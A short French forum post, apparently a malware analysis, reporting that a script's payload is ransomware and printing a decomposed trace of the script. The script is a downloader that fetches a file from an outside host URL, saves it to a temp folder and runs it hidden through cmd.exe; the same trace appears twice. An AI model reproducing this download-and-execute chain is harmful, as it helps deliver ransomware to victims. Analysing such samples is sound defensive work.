Supprimer un message
Clandestino
Alors, suite et fin :
- le payload est un ransomware/filelocker - donc une belle saloperie.
- voilà le script décomposé pour ceux que ça intéresse :
CreateObject(WScript.Shell)
CreateObject(MSXML2.XMLHTTP)
CreateObject(ADODB.Stream)
CreateObject(Scripting.FileSystemObject)->GetSpecialFolder(2)
CreateObject(Scripting.FileSystemObject)->GetTempName()
CreateObject(MSXML2.XMLHTTP)->open(GET http://digifish3.com/alarg.vbn,0)
CreateObject(MSXML2.XMLHTTP)->send()
CreateObject(ADODB.Stream)->type=1
CreateObject(MSXML2.XMLHTTP)->ResponseBody
WScript->ScriptFullName
CreateObject(ADODB.Stream)->Open()
CreateObject(ADODB.Stream)->Write(CreateObject(MSXML2.XMLHTTP)->ResponseBody)
CreateObject(ADODB.Stream)->SaveToFile(CreateObject(Scripting.FileSystemObject)->GetSpecialFolder(2)/CreateObject(Scripting.FileSystemObject)->GetTempName())
CreateObject(ADODB.Stream)->Close()
CreateObject(WScript.Shell)->run(cmd.exe /c CreateObject(Scripting.FileSystemObject)->GetSpecialFolder(2)/CreateObject(Scripting.FileSystemObject)->GetTempName(),0)
- le payload est un ransomware/filelocker - donc une belle saloperie.
- voilà le script décomposé pour ceux que ça intéresse :
CreateObject(WScript.Shell)
CreateObject(MSXML2.XMLHTTP)
CreateObject(ADODB.Stream)
CreateObject(Scripting.FileSystemObject)->GetSpecialFolder(2)
CreateObject(Scripting.FileSystemObject)->GetTempName()
CreateObject(MSXML2.XMLHTTP)->open(GET http://digifish3.com/alarg.vbn,0)
CreateObject(MSXML2.XMLHTTP)->send()
CreateObject(ADODB.Stream)->type=1
CreateObject(MSXML2.XMLHTTP)->ResponseBody
WScript->ScriptFullName
CreateObject(ADODB.Stream)->Open()
CreateObject(ADODB.Stream)->Write(CreateObject(MSXML2.XMLHTTP)->ResponseBody)
CreateObject(ADODB.Stream)->SaveToFile(CreateObject(Scripting.FileSystemObject)->GetSpecialFolder(2)/CreateObject(Scripting.FileSystemObject)->GetTempName())
CreateObject(ADODB.Stream)->Close()
CreateObject(WScript.Shell)->run(cmd.exe /c CreateObject(Scripting.FileSystemObject)->GetSpecialFolder(2)/CreateObject(Scripting.FileSystemObject)->GetTempName(),0)